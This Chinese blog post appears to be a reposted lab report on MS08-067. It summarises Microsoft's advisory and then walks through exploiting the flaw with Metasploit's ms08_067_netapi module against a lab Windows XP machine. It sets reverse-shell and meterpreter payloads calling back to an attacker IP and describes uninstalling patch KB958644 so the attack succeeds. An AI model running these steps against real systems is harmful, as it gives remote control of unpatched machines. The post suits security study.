MS08-067


簡單介紹一下漏洞

    ms08-067 編輯 討論 

MS08-067漏洞將會影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta。

中文名
    ms08-067 
外文名
    ms08-067 

發布日期:
    2008/10/22 
下載大小:
    因操作系統而異 
類    別
    漏洞 

說明:微軟安全公告KB958644
漏洞影響:服務器服務中的漏洞可能允許遠程執行代碼
發布日期:2008/10/22
下載大小:因操作系統而異。
受影響的操作系統: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta
摘要
此安全更新解決了服務器服務中一個秘密報告的漏洞。 如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。 防火牆最佳做法和標准的默認防火牆配置有助於保護網絡資源免受從企業外部發起的攻擊。可以通過安裝本 Microsoft 更新程序來保護計算機不受侵害。安裝后,可能必須重新啟動計算機。
嚴重等級:Windows 2000;XP;Server 2003為嚴重,Windows Vista;Server 2008;7 Beta為重要。

0X02實戰

靶機ip 192.168.1.134   windows

攻擊機  192.168.1.137  kali

先嘗試一下能不能ping通

能ping通 

MS08_067遠程漏洞攻擊實踐:Shell

1、在kali終端中開啟msfconsole。

2然后找這個漏洞的利用方法

msf5 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

3、輸入命令use exploit/windows/smb/ms08_067_netapi,進入該漏洞模塊的使用。

4、輸入命令show payload會顯示出有效的攻擊載荷,如下圖所示,我們找到一個shell_reverse_tcp。

5、命令show targets會顯示出可以被攻擊的靶機的操作系統型號,如下圖所示:

6、使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷。

7、輸入命令show options顯示我們需要在攻擊前需要設置的數據,如下圖紅框圈住的部分。

8、輸入命令

msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.137
LHOST => 192.168.1.137
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST  192.168.1.134
RHOST => 192.168.134

然后9、輸入命令exploit開始攻擊,如下圖所示是正常攻擊成功結果。

返回seesion就可以拿到shell

Seeion –L

就你可以看見這個shell

Seeions –I 1

進入shell

 下面是轉的別人的

MS08_067遠程漏洞攻擊實踐:meterpreter

1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,進入ms08_067漏洞模塊。

2、設置payload:set payload windows/meterpreter/reverse_tcp

3、show options,查看需要設置的ip地址,如下圖所示,是已經設置好的

4、成功攻擊結果:

5、執行ifconfig,查看靶機地址:

6、ps查看進程:

7、meterpreter轉shell:

實驗中遇到的問題

1、在做實驗的時候用老師的xp系統作為靶機,但是在exploit的時候顯示如下:no session was created。

2、手動設置一個set session 1,結果還是不成功。

3、在exploit前,使用check查看靶機狀態,返回以下信息,表明目標主機是安全的,不能被攻擊。

4、網上查到可以卸載ms08_067的補丁,即卸載KB958644,文件路徑:c:/windows找到KB958644(這是個隱藏文件),打開卸載exe程序,如下:

5、重啟后,還是不能成功,最后找了一個英文版的win xp sp 3 ,才成功完成。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM